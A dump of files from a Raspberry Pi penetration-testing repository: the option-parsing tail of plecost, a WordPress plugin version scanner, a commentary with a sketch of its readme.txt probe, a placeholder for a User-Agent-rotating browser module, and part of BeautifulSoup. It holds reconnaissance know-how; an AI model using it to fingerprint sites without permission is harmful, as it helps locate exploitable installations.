        print "[!] You must specify a maximum sleep time for the \"-M\" parameter."
        print ""
    if err.opt == "n":
        print ""
        print "[!] You must specify a number of checks for the \"-n\" parameter."
        print ""
    if err.opt == "l":
        print ""
        print "[!] You must specify a limit on google search results for the \"-l\" parameter."
        print ""
    sys.exit(-1)

if len(sys.argv) <= 1:
    print help
    print usage
    sys.exit(-1)

# Show help?
if "-h" in options:
    print help
    print usage
    sys.exit(0)

# Number of checks
if "-n" in options:
    try:
        NumChecks = options["-n"]
        if NumChecks < 0:
            raise Exception
        print "[*] Num of checks set to: " + NumChecks
    except Exception:
        print ""
        print "[!] You must specify a number of checks for the \"-n\" parameter."
        print ""
        sys.exit(-1)

# Reload option
if "-R" in options:
    PluginList = options["-R"]
    print "[*] Plugin file list set to: " + PluginList
    # Reload plugin options
    print ""
    print "[*] Reloading plugins list..."
    try:
        r=Wordpress()
        r.pluginlist_generate()
    except KeyboardInterrupt:
        print ""
        print "[*] Exiting..."
        print ""
    print "[*] done."
    sys.exit(0)

# Input file plugins
if not "-i" in options:
    print ""
    print "[!] You must specify the \"-i\" parameter."
    print ""
    sys.exit(-1)
else:
    InputPluginList = options["-i"]
    print ""
    print "-------------------------------------------------"
    print "[*] Input plugin list set to: " + InputPluginList

# Output file for results
if "-o" in options:
    OutPutFile = options["-o"]
    print "[*] Output file set to: " + OutPutFile

# Colored output?
if "-c" in options:
    print "[*] Colored output set on."
    ColoredOutput = True

# Without cve parameter
if "-C" in options:
    WhithCVE = False

# Num of threads parameter
if "-t" in options:
    NumThreats = options["-t"]
    if NumThreats < 1:
        print ""
        print "[!] Number of threads must be > 0."
        print ""
        sys.exit(-1)
    print "[*] Num of threads set to: " + NumThreats

# Min sleep time
if "-s" in options:
    MinSleepTime = int(options["-s"])
    print "[*] Min sleep time set to: " + str(MinSleepTime)

# Max sleep time
if "-M" in options:
    MaxSleepTime = int(options["-M"])
    # check that the minimum is not greater than the maximum
    if MinSleepTime > MaxSleepTime:
        print ""
        print "[!] The minimum sleep time can't be greater than the maximum sleep time."
        print ""
    print "[*] Max sleep time set to: " + str(MaxSleepTime)

# Google search option
if "-G" in options:
    print "[*] Searching for google results... "
    print ""
    # Output file
    if not "-o" in options:
        print ""
        print "[!] You must specify an output file for the \"-o\" parameter."
        print ""
        sys.exit(-1)
    # check if limit is set
    if "-l" in options:
        limitForSearch = options["-l"]
        if not limitForSearch.isdigit():
            print ""
            print "[!] The \"-l\" option must be an integer number."
            print ""
            sys.exit(-1)
    OutPutFile = options["-o"]
    print "[*] Max results set to: ",
    print limitForSearch
    print "[*] Output file set to: " + OutPutFile
    print "-------------------------------------------------"
    try:
        # Call the function
        s=gsearch(InputPluginList,OutPutFile)
        s.Run()
        print "[*] Done"
    except KeyboardInterrupt:
        print ""
        print "[*] Exiting..."
        print ""
    sys.exit(-1)

# Check target
try:
    TargetURL = args[0]
except Exception:
    print ""
    print "[!] You must specify a target. Try \"-h\" for more info."
    print ""
    sys.exit(-1)

# close params header
print "-------------------------------------------------"

#
# Start of program
#
try:
    website = Wordpress()
    website.check_url(TargetURL)
except KeyboardInterrupt:
    print ""
    print "[*] Exiting..."
    print ""
27,299
Python
.py
764
26.789267
227
0.531507
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
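The core fingerprint in plecost's check_url/__siteSearch above boils down to two HTTP fetches: /readme.html for the WordPress core version, and /wp-content/plugins/<name>/readme.txt for the plugin's "Stable tag:" line. A standalone sketch of that plugin probe in the same Python 2 style (probe_plugin, and the host and plugin names in the usage line, are illustrative and not part of the file above):

import urllib

def probe_plugin(site, plugin):
    # Same trick plecost uses: a plugin's readme leaks its version
    # in the "Stable tag:" line, and the file may be readme.txt or README.txt.
    for readme in ('readme.txt', 'README.txt'):
        url = 'http://%s/wp-content/plugins/%s/%s' % (site, plugin, readme)
        try:
            data = urllib.urlopen(url).read()
        except IOError:
            continue
        loc = data.lower().find('stable tag:')
        if loc != -1:
            # Take the rest of the "Stable tag:" line as the installed version.
            return data[loc + 11:].split('\n')[0].strip()
    return None

print probe_plugin('www.example.com', 'akismet')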
18,916
browser.pyc
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/browser.pyc
[content omitted: CPython 2.x compiled bytecode (marshal data), not representable as text. Recoverable strings show a pool of desktop browser User-Agent values and the classes BrowserError, PoolHTTPConnection, PoolHTTPHandler, and Browser (get_page, set_random_user_agent), compiled from /pentest/plecost/xgoogle/browser.py.]
6,544
Python
.py
22
296.454545
2,001
0.533803
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
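From the strings visible in browser.pyc above, xgoogle's Browser class wraps urllib2 and rotates among a fixed pool of desktop User-Agent headers. A rough, hedged equivalent of that rotation (the agent list is abbreviated from the strings in the bytecode, and browse() is our name, not the xgoogle API):

import random
import urllib2

AGENTS = [
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6',
    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
]

def browse(url):
    # Pick a fresh User-Agent per request, as Browser.set_random_user_agent does.
    req = urllib2.Request(url, headers={'User-Agent': random.choice(AGENTS)})
    return urllib2.urlopen(req, timeout=10).read()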
18,917
BeautifulSoup.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/BeautifulSoup.py
"""Beautiful Soup Elixir and Tonic "The Screen-Scraper's Friend" http://www.crummy.com/software/BeautifulSoup/ Beautiful Soup parses a (possibly invalid) XML or HTML document into a tree representation. It provides methods and Pythonic idioms that make it easy to navigate, search, and modify the tree. A well-formed XML/HTML document yields a well-formed data structure. An ill-formed XML/HTML document yields a correspondingly ill-formed data structure. If your document is only locally well-formed, you can use this library to find and process the well-formed part of it. Beautiful Soup works with Python 2.2 and up. It has no external dependencies, but you'll have more success at converting data to UTF-8 if you also install these three packages: * chardet, for auto-detecting character encodings http://chardet.feedparser.org/ * cjkcodecs and iconv_codec, which add more encodings to the ones supported by stock Python. http://cjkpython.i18n.org/ Beautiful Soup defines classes for two main parsing strategies: * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific language that kind of looks like XML. * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid or invalid. This class has web browser-like heuristics for obtaining a sensible parse tree in the face of common HTML errors. Beautiful Soup also defines a class (UnicodeDammit) for autodetecting the encoding of an HTML or XML document, and converting it to Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser. For more than you ever wanted to know about Beautiful Soup, see the documentation: http://www.crummy.com/software/BeautifulSoup/documentation.html Here, have some legalese: Copyright (c) 2004-2007, Leonard Richardson All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the the Beautiful Soup Consortium and All Night Kosher Bakery nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. 
""" from __future__ import generators __author__ = "Leonard Richardson (leonardr@segfault.org)" __version__ = "3.0.6" __copyright__ = "Copyright (c) 2004-2008 Leonard Richardson" __license__ = "New-style BSD" from sgmllib import SGMLParser, SGMLParseError import codecs import types import re import sgmllib try: from htmlentitydefs import name2codepoint except ImportError: name2codepoint = {} #This hack makes Beautiful Soup able to parse XML with namespaces sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*') DEFAULT_OUTPUT_ENCODING = "utf-8" # First, the classes that represent markup elements. class PageElement: """Contains the navigational information for some part of the page (either a tag or a piece of text)""" def setup(self, parent=None, previous=None): """Sets up the initial relations between this element and other elements.""" self.parent = parent self.previous = previous self.next = None self.previousSibling = None self.nextSibling = None if self.parent and self.parent.contents: self.previousSibling = self.parent.contents[-1] self.previousSibling.nextSibling = self def replaceWith(self, replaceWith): oldParent = self.parent myIndex = self.parent.contents.index(self) if hasattr(replaceWith, 'parent') and replaceWith.parent == self.parent: # We're replacing this element with one of its siblings. index = self.parent.contents.index(replaceWith) if index and index < myIndex: # Furthermore, it comes before this element. That # means that when we extract it, the index of this # element will change. myIndex = myIndex - 1 self.extract() oldParent.insert(myIndex, replaceWith) def extract(self): """Destructively rips this element out of the tree.""" if self.parent: try: self.parent.contents.remove(self) except ValueError: pass #Find the two elements that would be next to each other if #this element (and any children) hadn't been parsed. Connect #the two. lastChild = self._lastRecursiveChild() nextElement = lastChild.next if self.previous: self.previous.next = nextElement if nextElement: nextElement.previous = self.previous self.previous = None lastChild.next = None self.parent = None if self.previousSibling: self.previousSibling.nextSibling = self.nextSibling if self.nextSibling: self.nextSibling.previousSibling = self.previousSibling self.previousSibling = self.nextSibling = None return self def _lastRecursiveChild(self): "Finds the last element beneath this object to be parsed." lastChild = self while hasattr(lastChild, 'contents') and lastChild.contents: lastChild = lastChild.contents[-1] return lastChild def insert(self, position, newChild): if (isinstance(newChild, basestring) or isinstance(newChild, unicode)) \ and not isinstance(newChild, NavigableString): newChild = NavigableString(newChild) position = min(position, len(self.contents)) if hasattr(newChild, 'parent') and newChild.parent != None: # We're 'inserting' an element that's already one # of this object's children. if newChild.parent == self: index = self.find(newChild) if index and index < position: # Furthermore we're moving it further down the # list of this object's children. That means that # when we extract this element, our target index # will jump down one. 
position = position - 1 newChild.extract() newChild.parent = self previousChild = None if position == 0: newChild.previousSibling = None newChild.previous = self else: previousChild = self.contents[position-1] newChild.previousSibling = previousChild newChild.previousSibling.nextSibling = newChild newChild.previous = previousChild._lastRecursiveChild() if newChild.previous: newChild.previous.next = newChild newChildsLastElement = newChild._lastRecursiveChild() if position >= len(self.contents): newChild.nextSibling = None parent = self parentsNextSibling = None while not parentsNextSibling: parentsNextSibling = parent.nextSibling parent = parent.parent if not parent: # This is the last element in the document. break if parentsNextSibling: newChildsLastElement.next = parentsNextSibling else: newChildsLastElement.next = None else: nextChild = self.contents[position] newChild.nextSibling = nextChild if newChild.nextSibling: newChild.nextSibling.previousSibling = newChild newChildsLastElement.next = nextChild if newChildsLastElement.next: newChildsLastElement.next.previous = newChildsLastElement self.contents.insert(position, newChild) def append(self, tag): """Appends the given tag to the contents of this tag.""" self.insert(len(self.contents), tag) def findNext(self, name=None, attrs={}, text=None, **kwargs): """Returns the first item that matches the given criteria and appears after this Tag in the document.""" return self._findOne(self.findAllNext, name, attrs, text, **kwargs) def findAllNext(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns all items that match the given criteria and appear after this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.nextGenerator, **kwargs) def findNextSibling(self, name=None, attrs={}, text=None, **kwargs): """Returns the closest sibling to this Tag that matches the given criteria and appears after this Tag in the document.""" return self._findOne(self.findNextSiblings, name, attrs, text, **kwargs) def findNextSiblings(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns the siblings of this Tag that match the given criteria and appear after this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.nextSiblingGenerator, **kwargs) fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x def findPrevious(self, name=None, attrs={}, text=None, **kwargs): """Returns the first item that matches the given criteria and appears before this Tag in the document.""" return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs) def findAllPrevious(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns all items that match the given criteria and appear before this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.previousGenerator, **kwargs) fetchPrevious = findAllPrevious # Compatibility with pre-3.x def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs): """Returns the closest sibling to this Tag that matches the given criteria and appears before this Tag in the document.""" return self._findOne(self.findPreviousSiblings, name, attrs, text, **kwargs) def findPreviousSiblings(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns the siblings of this Tag that match the given criteria and appear before this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.previousSiblingGenerator, **kwargs) fetchPreviousSiblings = findPreviousSiblings # Compatibility with 
pre-3.x def findParent(self, name=None, attrs={}, **kwargs): """Returns the closest parent of this Tag that matches the given criteria.""" # NOTE: We can't use _findOne because findParents takes a different # set of arguments. r = None l = self.findParents(name, attrs, 1) if l: r = l[0] return r def findParents(self, name=None, attrs={}, limit=None, **kwargs): """Returns the parents of this Tag that match the given criteria.""" return self._findAll(name, attrs, None, limit, self.parentGenerator, **kwargs) fetchParents = findParents # Compatibility with pre-3.x #These methods do the real heavy lifting. def _findOne(self, method, name, attrs, text, **kwargs): r = None l = method(name, attrs, text, 1, **kwargs) if l: r = l[0] return r def _findAll(self, name, attrs, text, limit, generator, **kwargs): "Iterates over a generator looking for things that match." if isinstance(name, SoupStrainer): strainer = name else: # Build a SoupStrainer strainer = SoupStrainer(name, attrs, text, **kwargs) results = ResultSet(strainer) g = generator() while True: try: i = g.next() except StopIteration: break if i: found = strainer.search(i) if found: results.append(found) if limit and len(results) >= limit: break return results #These Generators can be used to navigate starting from both #NavigableStrings and Tags. def nextGenerator(self): i = self while i: i = i.next yield i def nextSiblingGenerator(self): i = self while i: i = i.nextSibling yield i def previousGenerator(self): i = self while i: i = i.previous yield i def previousSiblingGenerator(self): i = self while i: i = i.previousSibling yield i def parentGenerator(self): i = self while i: i = i.parent yield i # Utility methods def substituteEncoding(self, str, encoding=None): encoding = encoding or "utf-8" return str.replace("%SOUP-ENCODING%", encoding) def toEncoding(self, s, encoding=None): """Encodes an object to a string in some encoding, or to Unicode. .""" if isinstance(s, unicode): if encoding: s = s.encode(encoding) elif isinstance(s, str): if encoding: s = s.encode(encoding) else: s = unicode(s) else: if encoding: s = self.toEncoding(str(s), encoding) else: s = unicode(s) return s class NavigableString(unicode, PageElement): def __getnewargs__(self): return (NavigableString.__str__(self),) def __getattr__(self, attr): """text.string gives you text. 
This is for backwards compatibility for Navigable*String, but for CData* it lets you get the string without the CData wrapper.""" if attr == 'string': return self else: raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr) def __unicode__(self): return str(self).decode(DEFAULT_OUTPUT_ENCODING) def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): if encoding: return self.encode(encoding) else: return self class CData(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<![CDATA[%s]]>" % NavigableString.__str__(self, encoding) class ProcessingInstruction(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): output = self if "%SOUP-ENCODING%" in output: output = self.substituteEncoding(output, encoding) return "<?%s?>" % self.toEncoding(output, encoding) class Comment(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<!--%s-->" % NavigableString.__str__(self, encoding) class Declaration(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<!%s>" % NavigableString.__str__(self, encoding) class Tag(PageElement): """Represents a found HTML tag with its attributes and contents.""" def _invert(h): "Cheap function to invert a hash." i = {} for k,v in h.items(): i[v] = k return i XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", "quot" : '"', "amp" : "&", "lt" : "<", "gt" : ">" } XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) def _convertEntities(self, match): """Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.""" x = match.group(1) if self.convertHTMLEntities and x in name2codepoint: return unichr(name2codepoint[x]) elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: if self.convertXMLEntities: return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] else: return u'&%s;' % x elif len(x) > 0 and x[0] == '#': # Handle numeric entities if len(x) > 1 and x[1] == 'x': return unichr(int(x[2:], 16)) else: return unichr(int(x[1:])) elif self.escapeUnrecognizedEntities: return u'&amp;%s;' % x else: return u'&%s;' % x def __init__(self, parser, name, attrs=None, parent=None, previous=None): "Basic constructor." # We don't actually store the parser object: that lets extracted # chunks be garbage-collected self.parserClass = parser.__class__ self.isSelfClosing = parser.isSelfClosingTag(name) self.name = name if attrs == None: attrs = [] self.attrs = attrs self.contents = [] self.setup(parent, previous) self.hidden = False self.containsSubstitutions = False self.convertHTMLEntities = parser.convertHTMLEntities self.convertXMLEntities = parser.convertXMLEntities self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities # Convert any HTML, XML, or numeric entities in the attribute values. convert = lambda(k, val): (k, re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);", self._convertEntities, val)) self.attrs = map(convert, self.attrs) def get(self, key, default=None): """Returns the value of the 'key' attribute for the tag, or the value given for 'default' if it doesn't have that attribute.""" return self._getAttrMap().get(key, default) def has_key(self, key): return self._getAttrMap().has_key(key) def __getitem__(self, key): """tag[key] returns the value of the 'key' attribute for the tag, and throws an exception if it's not there.""" return self._getAttrMap()[key] def __iter__(self): "Iterating over a tag iterates over its contents." 
return iter(self.contents) def __len__(self): "The length of a tag is the length of its list of contents." return len(self.contents) def __contains__(self, x): return x in self.contents def __nonzero__(self): "A tag is non-None even if it has no contents." return True def __setitem__(self, key, value): """Setting tag[key] sets the value of the 'key' attribute for the tag.""" self._getAttrMap() self.attrMap[key] = value found = False for i in range(0, len(self.attrs)): if self.attrs[i][0] == key: self.attrs[i] = (key, value) found = True if not found: self.attrs.append((key, value)) self._getAttrMap()[key] = value def __delitem__(self, key): "Deleting tag[key] deletes all 'key' attributes for the tag." for item in self.attrs: if item[0] == key: self.attrs.remove(item) #We don't break because bad HTML can define the same #attribute multiple times. self._getAttrMap() if self.attrMap.has_key(key): del self.attrMap[key] def __call__(self, *args, **kwargs): """Calling a tag like a function is the same as calling its findAll() method. Eg. tag('a') returns a list of all the A tags found within this tag.""" return apply(self.findAll, args, kwargs) def __getattr__(self, tag): #print "Getattr %s.%s" % (self.__class__, tag) if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3: return self.find(tag[:-3]) elif tag.find('__') != 0: return self.find(tag) raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag) def __eq__(self, other): """Returns true iff this tag has the same name, the same attributes, and the same contents (recursively) as the given tag. NOTE: right now this will return false if two tags have the same attributes in a different order. Should this be fixed?""" if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other): return False for i in range(0, len(self.contents)): if self.contents[i] != other.contents[i]: return False return True def __ne__(self, other): """Returns true iff this tag is not identical to the other tag, as defined in __eq__.""" return not self == other def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING): """Renders this tag as a string.""" return self.__str__(encoding) def __unicode__(self): return self.__str__(None) BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" + ")") def _sub_entity(self, x): """Used with a regular expression to substitute the appropriate XML entity for an XML special character.""" return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Returns a string or Unicode representation of this tag and its contents. To get Unicode, pass None for encoding. NOTE: since Python's HTML parser consumes whitespace, this method is not certain to reproduce the whitespace present in the original string.""" encodedName = self.toEncoding(self.name, encoding) attrs = [] if self.attrs: for key, val in self.attrs: fmt = '%s="%s"' if isString(val): if self.containsSubstitutions and '%SOUP-ENCODING%' in val: val = self.substituteEncoding(val, encoding) # The attribute value either: # # * Contains no embedded double quotes or single quotes. # No problem: we enclose it in double quotes. # * Contains embedded single quotes. No problem: # double quotes work here too. # * Contains embedded double quotes. No problem: # we enclose it in single quotes. # * Embeds both single _and_ double quotes. 
This # can't happen naturally, but it can happen if # you modify an attribute value after parsing # the document. Now we have a bit of a # problem. We solve it by enclosing the # attribute in single quotes, and escaping any # embedded single quotes to XML entities. if '"' in val: fmt = "%s='%s'" if "'" in val: # TODO: replace with apos when # appropriate. val = val.replace("'", "&squot;") # Now we're okay w/r/t quotes. But the attribute # value might also contain angle brackets, or # ampersands that aren't part of entities. We need # to escape those to XML entities too. val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val) attrs.append(fmt % (self.toEncoding(key, encoding), self.toEncoding(val, encoding))) close = '' closeTag = '' if self.isSelfClosing: close = ' /' else: closeTag = '</%s>' % encodedName indentTag, indentContents = 0, 0 if prettyPrint: indentTag = indentLevel space = (' ' * (indentTag-1)) indentContents = indentTag + 1 contents = self.renderContents(encoding, prettyPrint, indentContents) if self.hidden: s = contents else: s = [] attributeString = '' if attrs: attributeString = ' ' + ' '.join(attrs) if prettyPrint: s.append(space) s.append('<%s%s%s>' % (encodedName, attributeString, close)) if prettyPrint: s.append("\n") s.append(contents) if prettyPrint and contents and contents[-1] != "\n": s.append("\n") if prettyPrint and closeTag: s.append(space) s.append(closeTag) if prettyPrint and closeTag and self.nextSibling: s.append("\n") s = ''.join(s) return s def decompose(self): """Recursively destroys the contents of this tree.""" contents = [i for i in self.contents] for i in contents: if isinstance(i, Tag): i.decompose() else: i.extract() self.extract() def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING): return self.__str__(encoding, True) def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Renders the contents of this tag as a string in the given encoding. If encoding is None, returns a Unicode string..""" s=[] for c in self: text = None if isinstance(c, NavigableString): text = c.__str__(encoding) elif isinstance(c, Tag): s.append(c.__str__(encoding, prettyPrint, indentLevel)) if text and prettyPrint: text = text.strip() if text: if prettyPrint: s.append(" " * (indentLevel-1)) s.append(text) if prettyPrint: s.append("\n") return ''.join(s) #Soup methods def find(self, name=None, attrs={}, recursive=True, text=None, **kwargs): """Return only the first child of this Tag matching the given criteria.""" r = None l = self.findAll(name, attrs, recursive, text, 1, **kwargs) if l: r = l[0] return r findChild = find def findAll(self, name=None, attrs={}, recursive=True, text=None, limit=None, **kwargs): """Extracts a list of Tag objects that match the given criteria. You can specify the name of the Tag and any attributes you want the Tag to have. The value of a key-value pair in the 'attrs' map can be a string, a list of strings, a regular expression object, or a callable that takes a string and returns whether or not the string matches for some custom definition of 'matches'. 
The same is true of the tag name.""" generator = self.recursiveChildGenerator if not recursive: generator = self.childGenerator return self._findAll(name, attrs, text, limit, generator, **kwargs) findChildren = findAll # Pre-3.x compatibility methods first = find fetch = findAll def fetchText(self, text=None, recursive=True, limit=None): return self.findAll(text=text, recursive=recursive, limit=limit) def firstText(self, text=None, recursive=True): return self.find(text=text, recursive=recursive) #Private methods def _getAttrMap(self): """Initializes a map representation of this tag's attributes, if not already initialized.""" if not getattr(self, 'attrMap'): self.attrMap = {} for (key, value) in self.attrs: self.attrMap[key] = value return self.attrMap #Generator methods def childGenerator(self): for i in range(0, len(self.contents)): yield self.contents[i] raise StopIteration def recursiveChildGenerator(self): stack = [(self, 0)] while stack: tag, start = stack.pop() if isinstance(tag, Tag): for i in range(start, len(tag.contents)): a = tag.contents[i] yield a if isinstance(a, Tag) and tag.contents: if i < len(tag.contents) - 1: stack.append((tag, i+1)) stack.append((a, 0)) break raise StopIteration # Next, a couple classes to represent queries and their results. class SoupStrainer: """Encapsulates a number of ways of matching a markup element (tag or text).""" def __init__(self, name=None, attrs={}, text=None, **kwargs): self.name = name if isString(attrs): kwargs['class'] = attrs attrs = None if kwargs: if attrs: attrs = attrs.copy() attrs.update(kwargs) else: attrs = kwargs self.attrs = attrs self.text = text def __str__(self): if self.text: return self.text else: return "%s|%s" % (self.name, self.attrs) def searchTag(self, markupName=None, markupAttrs={}): found = None markup = None if isinstance(markupName, Tag): markup = markupName markupAttrs = markup callFunctionWithTagData = callable(self.name) \ and not isinstance(markupName, Tag) if (not self.name) \ or callFunctionWithTagData \ or (markup and self._matches(markup, self.name)) \ or (not markup and self._matches(markupName, self.name)): if callFunctionWithTagData: match = self.name(markupName, markupAttrs) else: match = True markupAttrMap = None for attr, matchAgainst in self.attrs.items(): if not markupAttrMap: if hasattr(markupAttrs, 'get'): markupAttrMap = markupAttrs else: markupAttrMap = {} for k,v in markupAttrs: markupAttrMap[k] = v attrValue = markupAttrMap.get(attr) if not self._matches(attrValue, matchAgainst): match = False break if match: if markup: found = markup else: found = markupName return found def search(self, markup): #print 'looking for %s in %s' % (self, markup) found = None # If given a list of items, scan it for a text element that # matches. if isList(markup) and not isinstance(markup, Tag): for element in markup: if isinstance(element, NavigableString) \ and self.search(element): found = element break # If it's a Tag, make sure its name or attributes match. # Don't bother with Tags if we're searching for text. elif isinstance(markup, Tag): if not self.text: found = self.searchTag(markup) # If it's text, make sure the text matches. 
elif isinstance(markup, NavigableString) or \ isString(markup): if self._matches(markup, self.text): found = markup else: raise Exception, "I don't know how to match against a %s" \ % markup.__class__ return found def _matches(self, markup, matchAgainst): #print "Matching %s against %s" % (markup, matchAgainst) result = False if matchAgainst == True and type(matchAgainst) == types.BooleanType: result = markup != None elif callable(matchAgainst): result = matchAgainst(markup) else: #Custom match methods take the tag as an argument, but all #other ways of matching match the tag name as a string. if isinstance(markup, Tag): markup = markup.name if markup and not isString(markup): markup = unicode(markup) #Now we know that chunk is either a string, or None. if hasattr(matchAgainst, 'match'): # It's a regexp object. result = markup and matchAgainst.search(markup) elif isList(matchAgainst): result = markup in matchAgainst elif hasattr(matchAgainst, 'items'): result = markup.has_key(matchAgainst) elif matchAgainst and isString(markup): if isinstance(markup, unicode): matchAgainst = unicode(matchAgainst) else: matchAgainst = str(matchAgainst) if not result: result = matchAgainst == markup return result class ResultSet(list): """A ResultSet is just a list that keeps track of the SoupStrainer that created it.""" def __init__(self, source): list.__init__([]) self.source = source # Now, some helper functions. def isList(l): """Convenience method that works with all 2.x versions of Python to determine whether or not something is listlike.""" return hasattr(l, '__iter__') \ or (type(l) in (types.ListType, types.TupleType)) def isString(s): """Convenience method that works with all 2.x versions of Python to determine whether or not something is stringlike.""" try: return isinstance(s, unicode) or isinstance(s, basestring) except NameError: return isinstance(s, str) def buildTagMap(default, *args): """Turns a list of maps, lists, or scalars into a single map. Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and NESTING_RESET_TAGS maps out of lists and partial maps.""" built = {} for portion in args: if hasattr(portion, 'items'): #It's a map. Merge it. for k,v in portion.items(): built[k] = v elif isList(portion): #It's a list. Map each item to the default. for k in portion: built[k] = default else: #It's a scalar. Map it to the default. built[portion] = default return built # Now, the parser classes. class BeautifulStoneSoup(Tag, SGMLParser): """This class contains the basic parser and search code. It defines a parser that knows nothing about tag behavior except for the following: You can't close a tag without closing all the tags it encloses. That is, "<foo><bar></foo>" actually means "<foo><bar></bar></foo>". [Another possible explanation is "<foo><bar /></foo>", but since this class defines no SELF_CLOSING_TAGS, it will never use that explanation.] This class is useful for parsing XML or made-up markup languages, or when BeautifulSoup makes an assumption counter to what you were expecting.""" SELF_CLOSING_TAGS = {} NESTABLE_TAGS = {} RESET_NESTING_TAGS = {} QUOTE_TAGS = {} MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'), lambda x: x.group(1) + ' />'), (re.compile('<!\s+([^<>]*)>'), lambda x: '<!' + x.group(1) + '>') ] ROOT_TAG_NAME = u'[document]' HTML_ENTITIES = "html" XML_ENTITIES = "xml" XHTML_ENTITIES = "xhtml" # TODO: This only exists for backwards-compatibility ALL_ENTITIES = XHTML_ENTITIES # Used when determining whether a text node is all whitespace and # can be replaced with a single space. 
A text node that contains # fancy Unicode spaces (usually non-breaking) should be left # alone. STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, } def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None, markupMassage=True, smartQuotesTo=XML_ENTITIES, convertEntities=None, selfClosingTags=None): """The Soup object is initialized as the 'root tag', and the provided markup (which can be a string or a file-like object) is fed into the underlying parser. sgmllib will process most bad HTML, and the BeautifulSoup class has some tricks for dealing with some HTML that kills sgmllib, but Beautiful Soup can nonetheless choke or lose data if your data uses self-closing tags or declarations incorrectly. By default, Beautiful Soup uses regexes to sanitize input, avoiding the vast majority of these problems. If the problems don't apply to you, pass in False for markupMassage, and you'll get better performance. The default parser massage techniques fix the two most common instances of invalid HTML that choke sgmllib: <br/> (No space between name of closing tag and tag close) <! --Comment--> (Extraneous whitespace in declaration) You can pass in a custom list of (RE object, replace method) tuples to get Beautiful Soup to scrub your input the way you want.""" self.parseOnlyThese = parseOnlyThese self.fromEncoding = fromEncoding self.smartQuotesTo = smartQuotesTo self.convertEntities = convertEntities # Set the rules for how we'll deal with the entities we # encounter if self.convertEntities: # It doesn't make sense to convert encoded characters to # entities even while you're converting entities to Unicode. # Just convert it all to Unicode. self.smartQuotesTo = 